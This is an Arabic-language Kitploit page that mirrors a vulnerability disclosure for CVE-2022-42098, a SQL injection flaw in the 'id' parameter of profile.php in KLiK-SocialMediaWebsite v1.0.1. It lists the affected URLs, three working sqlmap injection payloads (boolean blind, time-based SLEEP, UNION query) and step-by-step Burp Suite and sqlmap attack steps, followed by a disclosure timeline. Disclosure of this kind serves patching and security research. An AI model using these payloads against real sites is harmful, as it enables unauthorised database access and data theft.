Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-42098 — KLiK-SocialMediaWebsite v1.0.1 يحتوي على ثغرات حقن SQL في profile.php | Kitploit
أدوات/GitHubGitHub/bypazs/cve-2022-42098
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubbypazs/cve-2022-42098

CVE-2022-42098

KLiK-SocialMediaWebsite v1.0.1 يحتوي على ثغرات حقن SQL في profile.php

عرض المستودع
1منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

KLiK-SocialMediaWebsite الإصدار v1.0.1

شرح الثغرة:

يحتوي KLiK-SocialMediaWebsite الإصدار v1.0.1 على ثغرات حقن SQL في profile.php عند المعامل id.

نواقل الهجوم:

في KLiK-SocialMediaWebsite الإصدار v1.0.1، بمجرد إنشاء مستخدم، يمكنه أيضاً البحث عن أشخاص في KLiK من خلال صفحة مستخدمي KLiK. يمكن إساءة استخدام معامل "id" في profile.php لحقن استعلامات SQL عشوائية.

المتأثر:

  • http://ip_address/KLiK/profile.php?id=user_id
  • GET /KLiK/login.php

الحمولة :

root@kitploit:~
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=27 AND 3227=3227

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=27 AND (SELECT 3046 FROM (SELECT(SLEEP(5)))barN)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: id=-2373 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71787a7171,0x6d67676474624545784f564265735871415865575a4f72697053686d724768624969514c70754459,0x717a707071),NULL,NULL,NULL,NULL,NULL,NULL#

تم الاختبار على:

  1. KLiK SocialMediaWebsite الإصدار v1.0.1 (https://github.com/msaad1999/KLiK-SocialMediaWebsite/releases/tag/v1.0.1)

  2. Firefox الإصدار 105

  3. sqlmap الإصدار 1.6.7 المستقر

خطوات الهجوم:

  1. سجّل الدخول باستخدام اسم المستخدم وكلمة المرور.
  2. انقر على الأيقونة التي تصوّر شخصاً في الزاوية العلوية اليمنى.
  3. اعترض الطلب باستخدام Burp Suite.
  4. اختر شخصاً من صفحة مستخدمي KLiK بالنقر على اسمه.
  5. بالعودة إلى Burp Suite، عند /profile.php، انقر بزر الفأرة الأيمن واختر "Copy to file".
  6. أرسل ملف الطلب إلى Kali Linux واستخدم sqlmap معه.
  7. تم اكتشاف ثغرة حقن SQL من خلال id

المكتشف:

:shipit: Grim The Ripper Team بواسطة SOSECURE Thailand

متوسط:

الجدول الزمني للإفصاح:

  • 2022–09–28: تم اكتشاف الثغرة.
  • 2022–09–28: تم الإبلاغ عن الثغرة إلى شركة MITRE.
  • 2022–10–15: تم حجز CVE.
  • 2022–10–31: الإفصاح العام عن الثغرة.

المراجع:

  1. https://github.com/msaad1999/KLiK-SocialMediaWebsite/releases/tag/v1.0.1

  2. https://github.com/msaad1999/KLiK-SocialMediaWebsite

تنزيل الأداة